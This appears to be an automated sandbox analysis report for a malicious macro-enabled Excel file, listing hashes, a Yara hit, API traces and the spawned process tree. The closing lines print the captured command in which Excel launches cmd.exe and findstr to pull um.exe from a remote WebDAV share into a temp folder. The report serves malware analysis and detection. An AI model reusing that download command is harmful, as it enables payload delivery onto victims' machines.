Summary | ZeroBOX

see.xlsm

VBA_macro
Category FILE
Machine s1_win7_x6401
Started April 18, 2022, 9:13 a.m.
Completed April 18, 2022, 9:15 a.m.
Size 32.9KB
Type Microsoft Excel 2007+
MD5 7a300b49ef5af319c91821cf2674d2b9
SHA256 fc2eca27d4ceaf134867b988ec20a27d2b4e11f89539975e31ea37827de9a6fd
CRC32 E28D4B8D
ssdeep 768:oK7xynmgCNL0vzwZhGjk9DnQZQJoD88yIvsIRKzUotQZf2bbFO:o2xymLNVzMk98+ootSokww
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
20.69.97.31 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\Documents>
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: FINDSTR: Cannot open \\20.69.97.31\webdav\um.exe
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fcc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fd1f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6fc61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x65001000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x75291000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x76451000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2772
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x735d1000
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$see.xlsm
Time & API Arguments Status Return Repeated

NtCreateFile

create_disposition: 2 (FILE_CREATE)
file_handle: 0x000003a8
filepath: C:\Users\test22\AppData\Local\Temp\~$see.xlsm
desired_access: 0xc0110080 (FILE_READ_ATTRIBUTES|DELETE|SYNCHRONIZE|GENERIC_WRITE)
file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN)
filepath_r: \??\C:\Users\test22\AppData\Local\Temp\~$see.xlsm
create_options: 4198496 (FILE_NON_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT|FILE_DELETE_ON_CLOSE)
status_info: 2 (FILE_CREATED)
share_access: 1 (FILE_SHARE_READ)
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /S /KC:\Windows\System32\findstr.exe /V /L W3AllLov3LolBas \\20.69.97.31\webdav\um.exe > C:\Windows\Temp\um.exe && exit
host 20.69.97.31
com_class WScript.Shell May attempt to create new processes
parent_process excel.exe martian_process "C:\Windows\System32\cmd.exe" /S /KC:\Windows\System32\findstr.exe /V /L W3AllLov3LolBas \\20.69.97.31\webdav\um.exe > C:\Windows\Temp\um.exe && exit
dead_host 20.69.97.31:445
file C:\Windows\System32\cmd.exe
file C:\Windows\Temp\um.exe